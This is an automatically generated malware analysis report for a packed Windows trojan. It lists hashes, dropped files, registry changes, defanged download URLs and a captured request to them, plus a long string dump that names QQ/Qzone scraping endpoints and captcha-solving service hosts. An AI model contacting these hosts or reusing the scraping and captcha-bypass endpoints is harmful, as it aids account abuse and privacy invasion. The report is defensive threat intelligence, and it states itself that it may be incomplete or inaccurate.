Gen.Variant.Strictor.85399_e57f1bfc87

by malwarelabrobot on June 22nd, 2015 in Malware Descriptions.

Gen:Variant.Strictor.85399 (B) (Emsisoft), Gen:Variant.Strictor.85399 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: e57f1bfc8727e723e1e054ab1c1b604d
SHA1: d3578f66a4edc5d90744eb97de09826b1ee99488
SHA256: 365e914f0487de35406932dfe001f667133a0b59ccbb4ec17bb87a3b87dde3c2
SSDeep: 49152:L7a/WjUo/YVGFNauDCcci8FaociAoujObHxM1fhjpRl JbzoE4t 08Cc:L7aK/YVxwrciGaoc5oui7xM1J7l qyR1
Size: 2704984 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-13 22:31:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:312

Mutexes

The following mutexes were created/opened:

RasPbFile
ini_read_write
ShimCacheMutex

File activity

The process %original file name%.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\sqlite3.dll (1825 bytes)
C:\qyd1.edb (260 bytes)
C:\qyd.db-journal (1594 bytes)
C:\qyd.db (149 bytes)
C:\qyd2.enx (1 bytes)

The Trojan deletes the following file(s):

C:\qyd.db-journal (0 bytes)

Registry activity

The process %original file name%.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 91 0C 33 E5 1C 5A D6 49 33 A2 39 62 EF 86 33"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Dropped PE files

MD5 File path
d6580cc678d0a80596628cd3cab61ff1 c:\sqlite3.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1495040 477184 5.54482 2df1d03837f8eda055db1aeda1c4fc06
.rdata 1499136 3969024 1871872 5.54508 b65e0bacce99825e449f72327415d6f9
.data 5468160 401408 32768 5.5395 788b268682a039752376bf6f115785e5
.rsrc 5869568 327680 16896 4.87096 09d660a79281a20da1f4b4074aecdfee
.aspack 6197248 303104 299520 2.8513 7996f58eb3fcde6ee9389b91969b0625
.adata 6500352 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://65770.vhost8.cloudvhost.cn/gx1.txt
hxxp://www.qqydw.com/gx1.txt 122.114.121.8


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /gx1.txt HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: VVV.qqydw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 21 Jun 2015 06:31:17 GMT
Server: Apache
Last-Modified: Sat, 20 Jun 2015 13:33:46 GMT
ETag: "3225a4-25b4-518f31706e280"
Accept-Ranges: bytes
Content-Length: 9652
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_312:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t%SVh
t$(SSh
u.hX%
~%UVW
u$SShe
ole32.dll
FastVerCode.dll
UUWiseHelper.dll
dc.dll
atl.dll
gdiplus.dll
shlwapi.dll
sqlite3.dll
kernel32.dll
GdiPlus.dll
user32.dll
Psapi.dll
Kernel32.dll
ADVAPI32.DLL
secur32.dll
advapi32.dll
shell32.dll
Rasapi32.dll
ntdll.dll
GetProcessHeap
CreateIoCompletionPort
ShellExecuteA
uu_loginA
ReportError
uu_reportError
sqlite3_errcode
sqlite3_open_v2
sqlite3_close
sqlite3_rekey
sqlite3_key
sqlite3_free
sqlite3_errmsg
sqlite3_libversion
sqlite3_busy_timeout
sqlite3_exec
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_int
sqlite3_finalize
sqlite3_get_table
sqlite3_free_table
sqlite3_interrupt
sqlite3_changes
GdiplusShutdown
sqlite3_bind_blob
sqlite3_data_count
sqlite3_reset
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_column_text
sqlite3_column_blob
sqlite3_column_int64
sqlite3_column_double
sqlite3_sql
sqlite3_column_bytes
EnumChildWindows
GetProcessHeaps
{B6F7542F-B8FE-46a8-9605-98856A687097}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
.idata
.edata
P.vmp0
`.vmp1
.reloc
P.rsrc
version.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
RegCloseKey
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
KEY: {
{3F4DACA4-160D-11D2-A8E9-00104B365C9F}
hXXp://cgi.find.qq.com/q
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.59 QQ/6.4.12593.201 Safari/537.36
hXXp://find.qq.com/index.html?version=1&im_version=5395&width=910&height=610&search_target=0
num=20&page=0&sessionid=0&keyword=&agerg=
&sessionid=1&keyword=&agerg=
"nick":"
\IP.qyd
hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=ip查询
hXXp://VVV.ip138.com/ips138.asp
qq.com/
zone.qq.com/cgi-bin/friendshow/cgi_get_visitor_simple?uin=
hXXp://g.
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
hXXp://b1.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
&unikey=
zone.qq.com/cgi-bin/likes/get_like_list_app?uin=
hXXp://users.
&url=
zone.qq.com/cgi-bin/blognew/blog_get_interaction?uin=
hXXp://b.
hXXp://user.qzone.qq.com/
"opnick":"
zone.qq.com/cgi-bin/blognew/get_comment_list?uin=
hXXp://b11.
zone.qq.com/cgi-bin/blognew/blog_output_data?uin=
hXXp://b1.
hXXp://ctc.qzs.qq.com/qzone/newblog/blogcanvas.html
hXXp://xiaoqu.qq.com/cgi-bin/bar/category_list
hXXp://xiaoqu.qq.com/mobile/index.html?_lv=28743&_wv=1027&_bid=128
Mozilla/5.0 (Linux; Android 4.4.2; GT-N7100 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 V1_AND_SQ_5.4.0_218_YYB_D QQ/5.4.1.2395 NetType/WIFI
hXXp://cgi.find.qq.com/
hXXp://find.qq.com/index.html?version=1&im_version=5365&width=910&height=610&search_target=0
QQ.txt
:hXXp://VVV.eyuyan.cc
zone.qq.com/cgi-bin/new/get_msgb?uin=
hXXp://m.
"nickname":"
hXXp://xiaoqu.qq.com/cgi-bin/bar/get_gbar_by_collction
hXXp://xiaoqu.qq.com/cgi-bin/bar/get_bar_list_by_category
@qq.com
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
798222986
hXXp://VVV.qqydw.com
hXXp://qqydw.com/sale.php?uid=5
hXXp://qqydw.com/xzzx.html
hXXp://
\sqlite3.dll
3.6.18
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYFcpD
KERNEL32.dll
sqlite3_aggregate_context
sqlite3_aggregate_count
sqlite3_auto_extension
sqlite3_backup_finish
sqlite3_backup_init
sqlite3_backup_pagecount
sqlite3_backup_remaining
sqlite3_backup_step
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_text
sqlite3_bind_text16
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_blob_bytes
sqlite3_blob_close
sqlite3_blob_open
sqlite3_blob_read
sqlite3_blob_write
sqlite3_busy_handler
sqlite3_clear_bindings
sqlite3_collation_needed
sqlite3_collation_needed16
sqlite3_column_bytes16
sqlite3_column_database_name
sqlite3_column_database_name16
sqlite3_column_decltype16
sqlite3_column_name16
sqlite3_column_origin_name
sqlite3_column_origin_name16
sqlite3_column_table_name
sqlite3_column_table_name16
sqlite3_column_text16
sqlite3_column_type
sqlite3_column_value
sqlite3_commit_hook
sqlite3_complete
sqlite3_complete16
sqlite3_config
sqlite3_context_db_handle
sqlite3_create_collation
sqlite3_create_collation16
sqlite3_create_collation_v2
sqlite3_create_function
sqlite3_create_function16
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_db_config
sqlite3_db_handle
sqlite3_db_mutex
sqlite3_db_status
sqlite3_declare_vtab
sqlite3_enable_load_extension
sqlite3_enable_shared_cache
sqlite3_errmsg16
sqlite3_expired
sqlite3_extended_errcode
sqlite3_extended_result_codes
sqlite3_file_control
sqlite3_get_autocommit
sqlite3_get_auxdata
sqlite3_global_recover
sqlite3_initialize
sqlite3_last_insert_rowid
sqlite3_libversion_number
sqlite3_limit
sqlite3_load_extension
sqlite3_malloc
sqlite3_memory_alarm
sqlite3_memory_highwater
sqlite3_memory_used
sqlite3_mprintf
sqlite3_mutex_alloc
sqlite3_mutex_enter
sqlite3_mutex_free
sqlite3_mutex_leave
sqlite3_mutex_try
sqlite3_next_stmt
sqlite3_open
sqlite3_open16
sqlite3_os_end
sqlite3_os_init
sqlite3_overload_function
sqlite3_prepare
sqlite3_prepare16
sqlite3_prepare16_v2
sqlite3_profile
sqlite3_progress_handler
sqlite3_randomness
sqlite3_realloc
sqlite3_release_memory
sqlite3_reset_auto_extension
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error16
sqlite3_result_error_code
sqlite3_result_error_nomem
sqlite3_result_error_toobig
sqlite3_result_int
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text16
sqlite3_result_text16be
sqlite3_result_text16le
sqlite3_result_value
sqlite3_result_zeroblob
sqlite3_rollback_hook
sqlite3_set_authorizer
sqlite3_set_auxdata
sqlite3_shutdown
sqlite3_sleep
sqlite3_snprintf
sqlite3_soft_heap_limit
sqlite3_sourceid
sqlite3_status
sqlite3_stmt_status
sqlite3_strnicmp
sqlite3_table_column_metadata
sqlite3_test_control
sqlite3_thread_cleanup
sqlite3_threadsafe
sqlite3_total_changes
sqlite3_trace
sqlite3_transfer_bindings
sqlite3_update_hook
sqlite3_user_data
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes16
sqlite3_value_double
sqlite3_value_int
sqlite3_value_int64
sqlite3_value_numeric_type
sqlite3_value_text
sqlite3_value_text16
sqlite3_value_text16be
sqlite3_value_text16le
sqlite3_value_type
sqlite3_version
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vmprintf
sqlite3_win32_mbcs_to_utf8
%s\etilqs_
OsError 0x%x (%u)
unknown database %s
%s-mjX
922337203685477580
RowKey
keyinfo(%d
%s(%d)
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s
database table is locked: %s
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
invalid page number %d
2nd reference to page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
cannot open indexed column for writing
cannot open value of type %s
sqlite_stat1
SELECT idx, stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s: %s.%s
%s: %s
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s
database schema is locked: %s
sqlite3_get_table() called with two or more incompatible queries
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
no such module: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
there is already another table or index with this name: %s
sqlite_
table %s may not be altered
view %s may not be altered
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
%s OR name=%Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
sqlite_detach
misuse of aggregate: %s()
invalid name: "%s"
not authorized to use function: %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
sqlite_attach
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
%s %T cannot reference objects in database %s
view %s is circularly defined
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
indexed columns are not unique
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
%s:%d
no such index: %s
sqlite_subquery_%p_
%s.%s
no such table: %s
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
at most %d tables in a join
cannot use index: %s
TABLE %s
%s AS %s
%s WITH INDEX %s
%s VIA MULTI-INDEX UNION
%s USING PRIMARY KEY
%s VIRTUAL TABLE INDEX %d:%s
%s ORDER BY
table %s: xBestIndex returned an invalid plan
sqlite_version
sqlite_source_id
d-d-d d:d:d
d:d:d
d-d-d
unable to close due to unfinished backup operation
SQL logic error or missing database
large file support is disabled
unable to use function %s in the requested context
no such vfs: %s
sqlite_rename_table
sqlite_rename_trigger
%.*s"%w"%s
automatic extension loading failed: %s
no such table column: %s.%s
c%d%s
unknown tokenizer: %s
%s%s%Q
%s,%Q HIDDEN
%s,docid HIDDEN)
docid INTEGER PRIMARY KEY,
create table %_segments( blockid INTEGER PRIMARY KEY, block blob);
create table %_segdir( level integer, idx integer, start_block integer, leaves_end_block integer, end_block integer, root blob, primary key(level, idx));
%d %d %d %d
Error in optimize: %s
porter
CREATE TABLE x(%s
%s, %s
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
PRAGMA %Q.page_size
%s {%s}
0&3*3.32363:3>3
1!2*232<2
C:\Windows\qqydw.ini
BFeUQy48sgDIgituHpLLjZpSFM99LRy5cgyfc2jZnBPXfs2bXCuDTPyRecN0KucEwKf1heFA4bVrg3yT45lkse/D0MebGxED/eMEmaLRA8jCQUC4a0vSDsfGFLgvYUnJhRssT6D8qhIBKCq3tm8nsux0QGJtS1vryWVq4x8uuKzXBfLxR5RnyAwimqrkz1IrVbmIueIPTNgKJUNuobkC/KDzpvVplDMOQLYlRDgXq1l/fPpgBzn8vM8TN698ao9rzXQh6zwhXnVKlqzm5vYf3ZsqTCx5RsuvlMWBPTpGbJ/DoKy6OVNdtPFVge1NrRTrE qD74RUBIw9KBQNBohq2pv69QekwgnzKQgP7uNePJysjqQc4o2cFA2KUJuMERdZNw9RSn8acmliXlb6wYGsg6zBlbGi86RUwq1OXi3AUan/iCU25icEkXwzFYR6aq07ddbdvfWztzH5SN76DgYF7s0I3PmEmzOYXKnl51lZTQoNGyrw8/GMAZqaS8HpyZMV9JacNBGVLdh1GBHcpJTdAWjHINn9F1Tkc0GFZaTTd4bBAzqqa8aIsUlVxhuKRWXwl8NTEQUtQCCJ1FpKv3p/2pTSxU28/SvEuk9zen0Jdqri3tOvI52dbF/8uhyHJPeVVPayPCtruRosJQ5zSiZbKALSshbqgClfDPBmXmLZMp5kDw2KXKiXratnmGZxPhpeAJxI4Makq210KZYcjhsH/7y2Zhw7BjqnmuTK9r53RppqCV4e0IdnraQz0xGlrpx6a2rcuUWm2KUbsS3t7o2GKZVdA3igPWDwU7m4ES6Tbm 6QqyxZ6zCuMlN7Z/kQN8pQrZxuHZOS7f3XQdG7c4aXWe0bZKaul2FvwJ8vN7r9vYS/I1pR5O6AjcyVqALs6IhNpqeAAGfB/8CM6zKz4mOafk2MHkcjXfNTo7g3uiOW3sgwS83oPWyUIEgbrA98NQ7rx19QqCduWyUD8uFMg/rmMJdcEivyNTtL 1MSE6c62XRuwnDsMIaJbMadQO28mnWQbkfDqYAqzLe/UMIclcevUsk ljHGsVNfgs/AJIul9Iup4SI9spHiXdTwiJEfYda9tidiYMJDCbSElQ01JIqoNyiQM6JhKbADW NLSJAwGIxF9JHRBTase IVZ8qtfhjfUGDDHp/64/1JnSKMgmmBG0GZQ93LqW3S0o2dtEjIIbrKeYN0nVAOD98TmsaaPXOIaLzsxI5eTQXoWmBvCoUod18iWA9cm8X6jtp744OxmkBCIzyGd/8/fVnuXtdDn5la9Heve8TbIx40H/doz26UEJkoi8Ee A0lyKMZzvf52tf0haJrjYLf6VFakw4d5/nNuqCiwkuBTxV43FM0jfTM2IyASsw1M6LT3RuE Dgdw6GJQav3PIcaX2FIP 3LMmyKs JssHRtEMYxbsWK ENrpWbtndIMjAqDCq65HlMS968j/w kdglMRCUnigeuKl208CkIBuGyFllo2KnZOmfyPjqrIeC9pzLSFQCaCBGtEzZ7d63qgkFPyNPtIgqNYwcHprANS3 ZWhQAzOWoVQhEwTGnd27OAu6VIzf DNK3bhZS2aQR/iMIUxzzaSniTaAN7fjOU/qMH2zNrPbFkUFbv9ieR6inLg/kQgj SZ/rnMOncErz3u1r/5O8LucOo6NW2b1orPbIBGSeBa0ctOUQpjRtoe6TLGGb9LXULJmIqM=
/qyd.db
\qyd1.edb
\qyd2.enx
/qyd1.edb
/qyd2.enx
/qyd.db-journal
hXXp://VVV.qqydw.com/gx1.txt
hXXp://xiaoqu.qq.com/cgi-bin/bar/post/get_post_by_page
hXXp://xiaoqu.qq.com/mobile/index.html?_lv=28743&_wv=1027&_bid=128
hXXp://xiaoqu.qq.com/cgi-bin/bar/post/get_comment_by_page
"nick_name":"
hXXp://cgi.find.qq.com/qqfind/lbs/get_neighbor
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.59 QQ/6.6.13172.201 Safari/537.36
hXXp://find.qq.com/index.html?version=1&im_version=5377&width=910&height=610&search_target=0
li=8gCXOMgLXqaPcunO3ta3IDtlmgmVGyrDUcwiZ4xG6rfCMC7G1uqttnxz+NCb21hzrbmnIXcHMFNxr6Dy/0IlyA==&sign=69FDFC9541B460DC62E17E0BB1E3CB6C6BCDAFB60B987E544BBE1E9DB2F4797B98B54CE208892DC07969BC79032594908DFECDCA98F9AB33&offset=1&cnt=20&sessionid=0
cookies.txt
zone.qq.com/cgi-bin/friendshow/cgi_get_visitor_single?uin=
hXXp://ctc.qzs.qq.com/qzone/v5/owner2/ic/feeds.html
/mood/
&unikey=http://user.qzone.qq.com/
q.com/cgi-bin/emotion_cgi_getcmtreply_v6?need_private_comment=1&uin=
hXXp://taotao.
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
\qyd.db
@1970-01-01 08:00:00
hXXp://b11.qzone.qq.com/cgi-bin/blognew/get_abs?hostUin=
\LZConfig.ini
\FastVerCode.dll
@.reloc
NETAPI32.dll
MFC42.DLL
SHLWAPI.dll
WININET.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
.PAVCInternetException@@
Content-Disposition: form-data; name="key"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN)
POST /api.php?mod=yzm&act=state HTTP/1.1
/api.php?mod=yzm&act=state
LZConfig.ini
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)
HTTP/1.1
/api.php?mod=yzm&act=add
POST /api.php?mod=yzmm&act=result_new HTTP/1.1
/api.php?mod=yzmm&act=result_new
POST /api.php?mod=yzm&act=point HTTP/1.1
/api.php?mod=yzm&act=point
POST /api.php?mod=yzm&act=register HTTP/1.1
/api.php?mod=yzm&act=register
eee.hyslt.com
POST /api.php?mod=dmuser&act=yzm_error HTTP/1.1
/api.php?mod=dmuser&act=yzm_error
.hyslt.com
XXXXXX
hXXp://ip.qq.com/
POST /api.php?mod=yzm&act=server HTTP/1.1
/api.php?mod=yzm&act=server
<&<3<@<{<
\UUExtConfig.ini
CodeType=0\UUWiseHelper.dll
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
urlmon.dll
dbghelp.dll
IPHLPAPI.DLL
WS2_32.dll
GetCPInfo
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
"0,01070
88J8R8x8
0#0'0-01070;0
=*>0>4>8><>
5%6S6
3$3,383\3|3
:-1014,URL
:-19011,
TEAKEY
\dc.dll
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
WSOCK32.dll
MSVCP60.dll
ReportError_A
VBYB_ReportError
VB_ReportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
